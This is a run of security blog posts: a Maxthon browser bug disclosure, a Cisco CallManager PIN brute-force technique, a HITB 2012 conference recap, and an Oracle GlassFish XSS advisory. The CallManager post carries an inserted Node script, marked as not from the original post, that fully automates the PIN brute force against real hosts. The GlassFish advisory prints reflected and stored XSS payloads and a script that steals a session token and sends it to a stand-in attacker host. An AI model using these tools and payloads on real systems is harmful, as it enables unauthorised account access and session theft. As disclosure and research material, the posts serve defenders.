Following disclosure of the bugs at the <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">HITB2012AMS conference</a>, it was observed that the maxthon.program object had been silently removed by Maxthon in recent versions. What remains still allows a malicious user to read and write files on the system.<br />
<br />
Code execution without triggering a warning or user prompt can still be achieved by overwriting an executable that the browser invokes directly. A "dirty" way is to overwrite j2plauncher.exe, assuming the victim has a JRE or JDK installed. The second step is to force Maxthon to load java.exe (e.g. by creating an iframe that points to a page which loads a Java Applet). This approach was successfully tested on Windows 7.<br />
<br />
On Windows XP, there are more executables that can be overwritten, e.g. C:\Program Files\Outlook Express\wab.exe, after which the browser can be forced to invoke wab.exe via window.location='ldap://dummy'.<br />
<br />
The PoC Metasploit module includes the "dirty" Java overwrite approach described above.<br />
<br />
<a href="https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_history_xcs.rb">https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_history_xcs.rb</a><br />
<br />
<b>Video</b><br />
<br />
Maxthon - Cross Context Scripting (XCS) - about:history - Java overwrite technique - Metasploit in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/2wiJKP5mbyQ?feature=player_embedded' frameborder='0'></iframe></div>
<b><br /></b>
Maxthon - Cross Context Scripting (XCS) - about:history - maxthon.program technique - Metasploit in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/N-5BkgJX8sI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<b><br /></b>
<b>Timeline</b><br />
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-86208390554411971592012-10-01T12:33:00.002+02:002012-10-01T12:33:54.749+02:00Cisco Unified Communications Manager (Call Manager) PIN brute force attack<br />
During a security review, I found a quick way to perform a PIN brute force attack against accounts registered with a Cisco Unified Communications Manager (CallManager). A quick google for "callmanager brute force" didn't bring up any relevant results, so I thought I would share the simple technique I used.<br />
<br />
When looking at the phone handset configuration, I noticed some URLs that allow the handset to retrieve Personal Address Book details or access the Fast Dials. That caught my attention and I immediately pointed my web proxy at those URLs, leaving the handset interface aside.<br />
<br />
When the handset is used, it simply performs HTTP requests to the CallManager, and those requests can be reproduced from any HTTP client.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Hi3S7b295cvgL1iTb8bEEcchvFBewL0JRy8eR8PTgc60MzaUTt9tUwvpJ61dCQvOvaxHeV9Zx4beE9zwBt4GGdP-7_wMSIvjrYFs4kqoIZP99Np_-lJsk77D1hDmdsr-pdNsDiIEWHw/s1600/Cisco+IP+Phone+CP-7961.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Hi3S7b295cvgL1iTb8bEEcchvFBewL0JRy8eR8PTgc60MzaUTt9tUwvpJ61dCQvOvaxHeV9Zx4beE9zwBt4GGdP-7_wMSIvjrYFs4kqoIZP99Np_-lJsk77D1hDmdsr-pdNsDiIEWHw/s400/Cisco+IP+Phone+CP-7961.jpg" width="298" /></a></div>
<br />
<br />
The handset initiates the login sequence with a simple HTTP GET request, such as the one below:<br />
<br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;">1) GET - https://x.x.x.x/ccmpd/pdCheckLogin.do?name=undefined
</pre>
<br />
The response contains a reference to the login.do page along with a "sid" token, which is used in the subsequent requests, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3HSTqSYjRXGDewwdnrnAzEp9Bqsm4tKBFxs_5tgB_jCkxwNprOyJUfWDlTRvE5G-aM9m-6P_eeybIUazJAg4XQcpnDlfzQE8w1DiJPBI3pdneCi53YW0Kx0krVOxKzAhq2kDE_35oEE/s1600/valid_sid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3HSTqSYjRXGDewwdnrnAzEp9Bqsm4tKBFxs_5tgB_jCkxwNprOyJUfWDlTRvE5G-aM9m-6P_eeybIUazJAg4XQcpnDlfzQE8w1DiJPBI3pdneCi53YW0Kx0krVOxKzAhq2kDE_35oEE/s640/valid_sid.png" width="640" /></a></div>
<br />
<br />
The sid token is required to perform the PIN brute force attack.<br />
<br />
The response also provides some clues on which parameters to include in the login request, such as userID and PIN. The following GET request can then be used to perform the PIN brute force attack:<br />
<br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;">2) GET - https://x.x.x.x/ccmpd/login.do?sid=_sid_value_&userid=_userid_&pin=_PIN_
</pre>
<br />
At this stage, the PIN brute force attack can begin: the valid sid token obtained above is passed with each authentication attempt.<br />
<br />
If the userID/PIN pair is wrong, the following response is returned:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxSq59_w2hRzztk_74nZSk-VBnpXkqCasJn9gdcpUkBwzUBmm-INCYIaqcIA-NURpmUjaJ29FIhpy9ZvG8edpdQT6J4WlaGhcRAtPW47piMwvYYDmhmKv72Wwo5dejdUa_Q6J1yQdD8M/s1600/error_message.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxSq59_w2hRzztk_74nZSk-VBnpXkqCasJn9gdcpUkBwzUBmm-INCYIaqcIA-NURpmUjaJ29FIhpy9ZvG8edpdQT6J4WlaGhcRAtPW47piMwvYYDmhmKv72Wwo5dejdUa_Q6J1yQdD8M/s1600/error_message.png" /></a></div>
<br />
It does not seem possible to enumerate userIDs. In that case, it is recommended to take a large username dictionary and try every username against the same PIN (e.g. common values such as 1234 or 12345). This can easily be done with the Burp Intruder tab, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPMHGo3DRJYKeE_elWizS8ecJy7-1ic0pWpmJiwJYH9VW9t8Qe8CzHysJBnubBQjlJvNfFoXMBZa7iUiAfRUBYJ8oxXR63dFRlxoodKOxZA1IWG5sprlxEBgMkSe2nJEtsshw9Jt0KQ6c/s1600/horizontal_pin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPMHGo3DRJYKeE_elWizS8ecJy7-1ic0pWpmJiwJYH9VW9t8Qe8CzHysJBnubBQjlJvNfFoXMBZa7iUiAfRUBYJ8oxXR63dFRlxoodKOxZA1IWG5sprlxEBgMkSe2nJEtsshw9Jt0KQ6c/s640/horizontal_pin.png" width="640" /></a></div>
<br />
<br />
If a correct userID/PIN pair is found, the response contains links for each service, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6FUbWcEbj24jAlttGFHKsiGombxgTB7qDS4B2TdL2lKRKVNe-bGPP1hJ8geC1FQ6Q-vTc0JbSyhSwhaAkCKcNA5rhZDt5MtR-nTvPVKfeLERWVmm8E_maTRrhCZPtHd2BBGwQBdc19ts/s1600/voip_links_clean.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6FUbWcEbj24jAlttGFHKsiGombxgTB7qDS4B2TdL2lKRKVNe-bGPP1hJ8geC1FQ6Q-vTc0JbSyhSwhaAkCKcNA5rhZDt5MtR-nTvPVKfeLERWVmm8E_maTRrhCZPtHd2BBGwQBdc19ts/s640/voip_links_clean.png" width="640" /></a></div>
<br />
The above sequence of requests can be trivially automated with a web proxy such as Burp, for instance by defining a macro.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVBqD70geNI6OAV8DQGJwXViseaqezJt4tC4jYTBZHjfC32TpL-1uzq-qsps3To1FP6FXhRKJ7VdGv19N0XNWMyIvD1Y_NuicfQzXA98iZYcz7uz8qF0OIDbKA_xX2kklTwdQkYSsA70/s1600/macro_setup.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVBqD70geNI6OAV8DQGJwXViseaqezJt4tC4jYTBZHjfC32TpL-1uzq-qsps3To1FP6FXhRKJ7VdGv19N0XNWMyIvD1Y_NuicfQzXA98iZYcz7uz8qF0OIDbKA_xX2kklTwdQkYSsA70/s640/macro_setup.png" width="640" /></a></div>
<br />
<br />
More information on how to configure macros in Burp, can be found here: <a href="http://portswigger.net/burp/help/options_sessions_macroeditor.html">http://portswigger.net/burp/help/options_sessions_macroeditor.html</a><br />
<br />
Once a valid userID/PIN is found, it is recommended to stop the brute force attack, generate a new sid token and then restart the brute force attack.<br />
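For those who prefer a script to a Burp macro, the following is an added example (not from the original post) that automates the two-step sequence above in Node. The GET transport is injected, so the logic runs offline against a constructed stand-in for the CallManager; for a real target, the curlGet helper (which assumes the curl binary is on the PATH) can be passed instead. Two things are assumptions rather than facts from the post: that the sid appears as a "sid=" query parameter in the login.do URL returned by pdCheckLogin.do, and the text of the error page, which must be taken from the response observed for a wrong userID/PIN.

```javascript
// Added example (not from the original post): the two-step CallManager login
// sequence automated in Node. The GET transport is injected so the logic runs
// offline against the constructed fake below; pass curlGet for a real target.

// Real transport: shells out to curl (-k because CallManager typically serves
// a self-signed certificate). Assumes curl is on the PATH.
function curlGet(url) {
  const { execFileSync } = require('node:child_process');
  return execFileSync('curl', ['-sk', '--max-time', '10', url], { encoding: 'utf8' });
}

// Step 1: pdCheckLogin.do answers with a login.do URL carrying the sid token.
// Assumption: the token appears as a "sid=" query parameter in that URL.
function extractSid(body) {
  const m = /login\.do\?[^"'<\s]*?sid=([^&"'<\s]+)/.exec(body);
  return m ? decodeURIComponent(m[1]) : null;
}

function fetchSid(base, get) {
  return extractSid(get(base + '/ccmpd/pdCheckLogin.do?name=undefined'));
}

// Step 2: the login request, exactly as in the post.
function loginUrl(base, sid, userid, pin) {
  return base + '/ccmpd/login.do?' + new URLSearchParams({ sid, userid, pin }).toString();
}

// PIN-major candidate order: every username against the first common PIN
// before moving to the next PIN, the "horizontal" pattern from the post.
function* horizontal(userids, pins) {
  for (const pin of pins) for (const userid of userids) yield [userid, pin];
}

// failureMarker is an assumption: a string that only appears in the error
// page returned for a wrong userid/PIN (take it from the observed response).
// After every hit the sid is regenerated, as the post recommends.
function bruteForce(base, candidates, get, failureMarker) {
  const found = [];
  let sid = fetchSid(base, get);
  if (!sid) throw new Error('no sid token in pdCheckLogin.do response');
  for (const [userid, pin] of candidates) {
    const body = get(loginUrl(base, sid, userid, pin));
    if (!body.includes(failureMarker)) {
      found.push({ userid, pin });
      sid = fetchSid(base, get);
      if (!sid) throw new Error('could not renew sid token');
    }
  }
  return found;
}

// Constructed stand-in for a CallManager (response bodies are made up):
// a fixed sid, and success only when sid, userid and PIN all match.
function fakeCallManager(validAccounts) {
  const SID = 'abc123';
  return function get(url) {
    const u = new URL(url);
    if (u.pathname.endsWith('/pdCheckLogin.do')) {
      return '<CiscoIPPhoneInput><URL>' + u.origin + '/ccmpd/login.do?sid=' + SID +
        '</URL></CiscoIPPhoneInput>';
    }
    const p = u.searchParams;
    if (p.get('sid') === SID && validAccounts[p.get('userid')] === p.get('pin')) {
      return '<CiscoIPPhoneMenu><MenuItem><Name>Personal Address Book</Name></MenuItem></CiscoIPPhoneMenu>';
    }
    return '<CiscoIPPhoneText><Text>Login Failed</Text></CiscoIPPhoneText>';
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const get = fakeCallManager({ alice: '1234' }); // replace with curlGet for a real run
  const hits = bruteForce('https://10.0.0.5',
    horizontal(['bob', 'alice', 'carol'], ['1234', '12345']), get, 'Login Failed');
  console.log(hits);
}
```

The candidate generator keeps the request count explicit: with N usernames and a short list of common PINs, the whole run is N requests per PIN plus one sid refresh per hit, which is worth knowing before pointing it at a production CallManager.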
<br />
Happy hacking!Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com9tag:blogger.com,1999:blog-5593108060941425908.post-36841969777242387352012-06-08T06:59:00.001+02:002012-06-08T06:59:44.608+02:00Hack In the Box 2012 Amsterdam - Recap<div class="separator" style="clear: both; text-align: center;">
<a href="http://conference.hitb.org/hitbsecconf2012ams/"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Iyk-4hvBEninAXIcobx15JjPz41Xypab7in7qHOtgbhUecK5WXaDMzf9OjXJ-IR8VOHc8ItHrhnzhsGrsnhs5l7t-OOtUdFxL7PAthyphenhyphenHbi51LExy9s-Z-fLsW6YkS6KY6SLrhqI1c70/s400/logo.jpg" width="400" /></a></div>
<br />
I promised I would write something about my <a href="http://conference.hitb.org/hitbsecconf2012ams/">Hack In the Box 2012 Amsterdam</a> conference experience.<br />
<br />
First thing: it was one of the best security conferences I have ever been to. Big props to Dhillon (<a href="https://twitter.com/#!/l33tdawg">@l33tdawg</a>) and the HITB crew for organising such an event. I have organised conferences in the past (<a href="https://www.owasp.org/index.php/OWASP_New_Zealand_Day_2009">OWASP NZ Day 2009</a> and <a href="https://www.owasp.org/index.php/OWASP_New_Zealand_Day_2010">2010</a>) and I know something about what happens behind the scenes.<br />
<br />
The conference venue was awesome, a pimping five-star hotel ;-) and again I need to thank the crew for the wise choice. The bad thing is that I checked out with my wallet "lighter" than usual, after having dinners at the Japanese restaurants and trying all the amenities of the fitness centre.
<br />
<br />
My talk (<a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">pdf</a> || <a href="http://www.slideshare.net/robertosl81/window-shopping-browser-bug-hunting-in-2012">slideshare</a>) was on the first day, along with two media interviews with Mirko Zorz (<a href="https://twitter.com/#!/helpnetsecurity">@helpnetsecurity</a>) of Help Net Security and Eduard Kovacs (<a href="https://twitter.com/#!/EduardKovacs">@EduardKovacs</a>) of Softpedia.<br />
<br />
Both interviews went pretty well and they will be published soon. Unfortunately, I wasn't able to see many talks during the first day. However, I found the slides of the following presentations interesting and entertaining to read:<br />
<br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf">Killing a bounty program, Twice</a>. - Itzhak (Zuk) Avraham (<a href="https://twitter.com/#!/ihackbanme">@ihackbanme</a>) and Nir Goldshlager (<a href="https://twitter.com/#!/Nirgoldshlager">@Nirgoldshlager</a>)<br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D1T1%20-%20Claudio%20Guarnieri%20-%20One%20Flew%20Over%20the%20Cuckoos%20Nest.pdf">One flew over the cuckoo's nest</a> - Claudio Guarnieri (<a href="https://twitter.com/#!/botherder">@botherder</a>).<br />
<br />
On the second day, I enjoyed Nicolas Gregoire (<a href="https://twitter.com/#!/Agarri_FR">@Agarri_FR</a>)'s talk "<a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T2%20-%20Nicolas%20Gregoire%20-%20Attacking%20XML%20Processing.pdf">Attacking XML processing</a>". The demo part was very cool and gave me some new ideas. I also attended Steven Seeley (<a href="https://twitter.com/#!/net__ninja">@net__ninja</a>)'s talk about <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T2%20-%20Steven%20Seeley%20-%20Ghost%20In%20the%20Windows%207%20Allocator.pdf">Ghost In the Windows 7 Allocator</a>, from which I learnt several things I didn't know about the Windows heap. I also attended some talks unrelated to my current area of research, which ended up giving me some collateral ideas:<br />
<br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T2%20-%20Rahul%20Sasi%20-%20CXML%20VXML%20Auditing%20for%20IVR%20Pentesters.zip">CXML VXML Auditing for IVR Pentesters</a> - Rahul Sasi - <a href="https://twitter.com/#!/fb1h2s">@fb1h2s</a><br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T1%20-%20Alex%20Bazhanyuk%20and%20Nikita%20Tarakanov%20-%20Automatically%20Searching%20for%20Vulnerabilities.pdf">Automatically Searching for Vulnerabilities</a> - Nikita Tarakanov - <a href="https://twitter.com/#!/NTarakanov">@NTarakanov</a><br />
<br />
All the slides/material of HITB2012AMS material can be found here: <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/">http://conference.hitb.org/hitbsecconf2012ams/materials/</a><br />
<br />
During the conference, I spent some great time going around Amsterdam with <a href="https://twitter.com/#!/net__ninja">@net__ninja</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghVIkVeBvHfR4iAjjy4ZFfjBRlZIvwQOgv2FuKiWZg4RbZFtzUpX7c__SxUCreHbBiYK76XdrbR0Ok4gDDsl8UZoHBVaLQKpfjlPfPGEcFvm0Vyp_oJJyWCX7yK7rN-8O_o8luRDFp304/s1600/ams1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghVIkVeBvHfR4iAjjy4ZFfjBRlZIvwQOgv2FuKiWZg4RbZFtzUpX7c__SxUCreHbBiYK76XdrbR0Ok4gDDsl8UZoHBVaLQKpfjlPfPGEcFvm0Vyp_oJJyWCX7yK7rN-8O_o8luRDFp304/s400/ams1.jpg" width="400" /></a></div>
<br />
I also met Peter Van Eeckhoutte (<a href="https://twitter.com/corelanc0d3r">@corelanc0d3r</a>) from the Corelan team, whom I need to thank for the <a href="https://www.corelan.be/index.php/2012/05/24/hitb2012ams-day-1-window-shopping/">very cool article he wrote</a> about my talk. I also had a few beers with Fred Raynal (<a href="https://twitter.com/#!/fredraynal">@fredraynal</a>) and met new friends, such as Claudio Guarnieri (<a href="https://twitter.com/#!/botherder">@botherder</a>) and Marco Balduzzi (<a href="https://twitter.com/#!/embyte">@embyte</a>).<br />
<br />
After my presentation, I met Arthur Gerkis (<a href="https://twitter.com/#!/ax330d">@ax330d</a>) and Christian Holler (<a href="https://twitter.com/#!/mozdeco">@mozdeco</a>); they both gave me some new ideas for fuzzing browsers, which I expect to adopt and try over the next few months.<br />
<br />
Hopefully, I will get an invite to HITB KUL next year ;-). I will definitely submit again to HITB2013AMS if I have new things to share.<br />
<br />
Finally, all the bugs, demos and exploits shown during my preso will be released sometime soon, so please keep watching this space or follow my <a href="https://twitter.com/malerisch">tweets</a> if you are interested ;-).<br />
<br />
Other blog posts about HITB2012AMS which you might find relevant:<br />
<br />
<a href="https://www.corelan.be/index.php/category/security/cons-seminars/">https://www.corelan.be/index.php/category/security/cons-seminars/</a>
<br />
<a href="http://blog.rootshell.be/2012/05/24/hitb-amsterdam-wrap-up-day-1/">http://blog.rootshell.be/2012/05/24/hitb-amsterdam-wrap-up-day-1/</a>
<br />
<a href="http://blog.rootshell.be/2012/05/25/hitb-amsterdam-wrap-up-day-2/">http://blog.rootshell.be/2012/05/25/hitb-amsterdam-wrap-up-day-2/</a><br />
<br />Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-17764020889070755882012-04-19T03:30:00.002+02:002012-04-19T03:40:38.892+02:00Oracle GlassFish Server - Multiple Cross Site Scripting VulnerabilitiesFollowing the <a href="http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html">disclosure of Oracle bugs</a>, here is another bug found in Oracle GlassFish Server 3.1.1. The interesting part of this advisory is the exploit. When looking at the features of Oracle GlassFish Server, I noticed that with an XSS it would be possible to steal the session token and bypass the HttpOnly protection. I found this to be the case when a user is authenticated to the REST interface, which does not have the same security controls as the main web administrative interface. Quite an interesting point to keep in mind when testing applications that come with both a standard interface and a REST interface.<br />
<b><br />
</b><br />
<b>Details</b><br />
<br />
<b>Vendor Site: </b>Oracle (www.oracle.com)<br />
<span style="font-weight: bold;">Date: </span>April 19th, 2012 – CVE-2012-0551<br />
<span style="font-weight: bold;">Affected Software: </span>Oracle GlassFish Server 3.1.1 (build 12)<br />
<span style="font-weight: bold;">Researcher: </span>Roberto Suggi Liverani<br />
<div><span style="font-weight: bold;">PDF version: </span><a href="http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_Multiple_XSS.pdf">http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_Multiple_XSS.pdf</a></div><br />
<br />
<b>Description</b><br />
<br />
Security-Assessment.com has discovered that components of the Oracle GlassFish Server administrative web interface are vulnerable to both reflected and stored Cross Site Scripting attacks. All pages where Cross Site Scripting vulnerabilities were discovered require authentication.<br />
<br />
<b>Reflected Cross Site Scripting </b><br />
<br />
Reflected Cross Site Scripting was discovered in multiple parts of the application. <br />
The table below details where Reflected Cross Site Scripting was detected and which parameters are vulnerable:<br />
<br />
<table border="1" cellpadding="2" cellspacing="2"><tbody>
<tr> <td><b>Page Affected</b></td> <td><b>Method</b></td> <td><b>Variable</b></td> </tr>
<tr> <td> /common/applications/lifecycleEdit.jsf?appName=<br />
test%27);alert(document.cookie)//test<br />
<div><br />
</div></td> <td> GET</td> <td> appName</td> </tr>
<tr> <td>/common/security/realms/realms.jsf?configName=default-config%22%29%3balert%281%29//test<br />
/web/grizzly/networkListeners.jsf?configName=default-configad217%22%29%3balert%281%29//test<br />
/common/security/auditModules/auditModules.jsf<br />
?configName=904895%22);alert(1);//test<br />
/common/security/jacc/jaccProviders.jsf?configName=904895%22);alert(1);//t<br />
/common/security/msgSecurity/msgSecurity.jsf?<br />
configName=904895%22);alert(1);//test<br />
/jms/jmsHosts.jsf?configName=904895%22);alert(1);//test<br />
/web/grizzly/networkListeners.jsf?configName=904895%22);alert(1);//test<br />
/web/grizzly/protocols.jsf?configName=904895%22);alert(1);//test<br />
/web/grizzly/transports.jsf?configName=904895%22);alert(1);//test<br />
<div><br />
</div></td> <td> GET</td> <td> configName</td> </tr>
<tr> <td> /xhp?key=aquarium%27%3b%3Cscript%3Ealert<br />
%281%29%3C/script%3E//test<br />
** Works in Internet Explorer (content sniffing)<br />
<div><br />
</div></td> <td> GET</td> <td> key</td> </tr>
</tbody></table><br />
<b>Stored Cross Site Scripting</b><br />
<br />
The table below details where Stored Cross Site Scripting was detected and which parameters are vulnerable:<br />
<br />
<table border="1" cellpadding="2" cellspacing="2"><tbody>
<tr> <td><b>Page Affected</b></td> <td><b>Rendered Page</b></td> <td><b>Method</b></td> <td><b>Variable</b></td> </tr>
<tr> <td> /management/domain/create-password-alias</td> <td> /management/<br />
domain/<br />
list-password-aliases<br />
/cluster/node/<br />
nodeEdit.jsf?<br />
nodeName=localhost-domain1&bare=true<br />
<div><br />
</div></td> <td> POST</td> <td> id</td> </tr>
<tr> <td>/common/appServer/pswdAliasNew.jsf<br />
** requires a valid javax.faces.ViewState<br />
<div><br />
</div></td> <td> /cluster/node/<br />
nodeEdit.jsf?<br />
nodeName=localhost<br />
domain1&bare=true<br />
<div><br />
</div></td> <td> POST</td> <td> propertyForm%3<br />
ApropertySheet<br />
%3ApropertSection<br />
TextField<br />
%3AaliasNameNew<br />
%3AaliasNameNew</td> </tr>
</tbody></table><br />
<i>Stored Cross Site Scripting - POST Request – REST Interface</i><br />
<br />
<pre class="brush:text; highlight:[7]" name="code" style="font-family: Arial,Helvetica,sans-serif;">POST /management/domain/create-password-alias HTTP/1.1
Host: 192.168.0.205:4848
[snip]
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
AS_ADMIN_ALIASPASSWORD=testing81&id=%22%3E%3Cscript%3Ealert%28%22viaREST%22%29%3B%3C%2Fscrip
t%3E&remove_empty_entries=true
</pre><br />
<i>Stored Cross Site Scripting - POST Request – Standard Web Interface</i><br />
<br />
<pre class="brush:text; highlight:[10]" name="code" style="font-family: Arial,Helvetica,sans-serif;">POST /common/appServer/pswdAliasNew.jsf HTTP/1.1
Host: 192.168.0.205:4848
[snip]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 889
Cookie: JSESSIONID=146c28566608602e3a73ab65f07c; treeForm_tree-hi=treeForm:tree:nodes
propertyForm%3ApropertySheet%3ApropertSectionTextField%3AaliasNameNew%3AaliasNameNew=%22%3E%
3Cscript%3Ealert(12345545)%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextF
ield%3AnewPasswordProp%3ANewPassword=test&propertyForm%3ApropertySheet%3ApropertSectionTextF
ield%3AconfirmPasswordProp%3AConfirmPassword=test&propertyForm%3AhelpKey=ref-pswdaliasnew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=-6862830673138436308%3A379100040679698460&com_sun_webui_util_FocusManager_focusElementId=prop
ertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.source=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.execute=%40all&javax.faces.pa
rtial.render=%40all&bare=true&propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=pr
opertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.ajax=true
</pre><br />
<b>Exploitation </b><br />
<br />
These vulnerabilities can be exploited in several ways. One example is to include an external JavaScript file, such as a JavaScript hook file provided by <a href="https://github.com/beefproject/beef">BeEF, the browser exploitation framework</a>. In this particular case, it is possible to steal the authentication token through the REST interface, bypassing the HttpOnly protection adopted for the JSESSIONID token in the standard web administrative interface.<br />
<br />
<b>Bypassing HTTPOnly protection and token theft via REST interface</b><br />
<br />
There is <a href="http://docs.oracle.com/cd/E18930_01/html/821-2416/gjipx.html">a feature</a> in Oracle GlassFish Server which allows a cookie to be used as the session management mechanism within the REST interface, instead of Basic Authentication on every request.<br />
<br />
This feature can be misused through a Cross Site Scripting vulnerability. An exploit scenario for both the stored and the reflected Cross Site Scripting vulnerabilities is to inject a JavaScript payload which performs an XMLHttpRequest (XHR) to retrieve a valid session token via the REST interface.<br />
<br />
The following exploit can be used to retrieve and steal a session token when a user is authenticated to the REST interface using Basic Authentication. The token can only be used as the value of a cookie named <i>gfresttoken</i>, and only within the REST interface.<br />
<br />
<i>Bypassing HTTPOnly and Stealing Session Token</i><br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;">function retrieveToken()
{
  var xmlhttp;
  if (window.XMLHttpRequest)
  { // code for IE7+, Firefox, Chrome, Opera, Safari
    xmlhttp = new XMLHttpRequest();
  }
  else
  { // code for IE6, IE5
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  xmlhttp.onreadystatechange = function()
  {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
    {}
  };
  // POST /management/sessions: the REST interface answers with a JSON session token
  // for the Basic-Authenticated user; the browser attaches the cached credentials
  xmlhttp.open("POST", "/management/sessions", true);
  xmlhttp.setRequestHeader("Accept", "application/json");
  xmlhttp.send();
  return xmlhttp;
}
function stealToken(a)
{
  var jsonObj = JSON.parse(a.responseText); // token retrieved and can be sent to attacker
  var img = document.createElement("IMG");
  img.setAttribute('src', 'http://attackersite/?token=' + jsonObj.extraProperties.token);
  document.body.appendChild(img); // time to grab the token
}
// this exploit works with browsers that have native JSON support
var a = retrieveToken(); // perform XHR to retrieve token
setTimeout('stealToken(a);', 12000); // needs time to load the token, then sends it to attackersite
// attacker then needs to set a cookie named gfresttoken with the token value obtained. The
// cookie has to be valid for the domain/IP address of the target Oracle GlassFish Server
</pre><br />
<b>Solution</b><br />
<br />
Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory - April 2012. Security-Assessment.com recommends applying the latest patch provided by the vendor.<br />
